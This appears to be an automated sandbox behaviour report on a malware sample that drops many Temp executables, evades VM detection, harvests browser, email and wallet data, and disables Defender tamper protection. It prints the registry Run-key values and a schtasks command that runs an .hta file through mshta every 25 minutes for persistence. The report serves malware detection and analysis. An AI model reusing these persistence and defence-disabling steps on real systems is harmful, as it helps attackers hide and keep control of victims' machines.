| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db4b761fdf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\db4b761fdf.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4592 set thread context of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 4400 set thread context of 2468 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 836 set thread context of 3748 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4932 set thread context of 1876 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848779747409536" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 152
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta
C:\Windows\SysWOW64\schtasks.exe
